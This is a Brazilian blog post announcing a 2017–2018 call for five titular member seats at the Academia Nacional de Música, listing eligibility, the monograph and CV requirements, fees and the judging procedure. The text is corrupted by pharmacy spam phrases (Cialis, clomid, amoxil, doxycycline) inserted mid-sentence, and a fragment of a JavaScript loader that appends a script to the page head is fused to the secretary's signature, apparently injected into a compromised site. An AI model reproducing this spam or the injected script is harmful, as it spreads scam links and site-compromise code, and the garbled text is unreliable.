ConcursoNotícia

Quer ser membro titular da Academia Nacional de Música?

Veja se você está apto… doxycyclin online


De ordem da Presidente da Academia Nacional de Música Acad. Carol Murta Ribeiro, torno público que se acham abertas, a partir de 01 de setembro de 2017 a 01 de março de 2018, as inscrições para 5 (cinco) vagas de Membro Titular da Academia Nacional de Música.

1. Cheap Da inscrição Purchase

1.1 – O candidato a Membro Titular deverá, de acordo com o Art. 8º dos Estatutos da ANM, preencher as seguintes condições:
a) ser brasileiro nato ou naturalizado, e ter domicílio no Brasil;
b) ser graduado em Música por tempo não inferior a 10 (dez anos) e/ou comprovar sua competência na área da Música, pelo mesmo prazo;
c) apresentar uma monografia de autoria própria que não tenha sido publicada;
d) possuir atividade profissional de Música mediante a apresentação dos seus títulos e trabalhos;
e) ser entrevistado pela Comissão de avaliação.

1.2– O candidato deverá assinar o Livro de Inscrições da Academia, formalizando a inscrição mediante o pagamento de meio salário mínimo, acompanhado de um requerimento, além de:
– apresentar Curriculum Vitae, em 03 vias, comprovado mediante cópia de seus títulos e diplomas;
– apresentar Monografia original e inédita, com mínimo de 30 (trinta) laudas, apresentada em 03 (três) cópias e / ou CD, configurado: – editoração Word for Windows; papel A4; fonte Times New Roman 12, (texto); espaço duplo.

1.3 – A inscrição poderá ser feita através de procuração do candidato, com firma reconhecida. – Para efeito de inscrição entrar em contato com a Secretaria tel: (21) 2543-9440/ celular (21) 9 9983-1000 /(21) 2222-6944.

1.4 – Local de inscrição: Academia Nacional de Música – Rua da Lapa, 120 7o. andar, Lapa, Rio de Janeiro, RJ CEP: 20021-180 e-mail: Pills Purchase Cialis Professional buy anmusica@ibest.com.br
2. Do julgamento

2.1– O julgamento será feito por uma comissão de 03 (três) Acadêmicos Membros Titulares e obedecerá ao disposto no Regimento Interno da Academia Nacional de Música.

2.2– O resultado apresentado pela Comissão é soberano.
3. Da admissão where to buy clomid online safely amoxil reviews

3.1 – A Posse do candidato eleito será realizada de acordo com o artigo 19 do Regimento Interno, após haver, obrigatoriamente, contribuído com a joia anual fixada e as despesas com as insígnias acadêmicas.

Gizélia Fernandes
2a. Secretária da ANMif (document.currentScript) { d.getElementsByTagName(‘head’)[0].appendChild(s); Purchase Cheap Buy

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.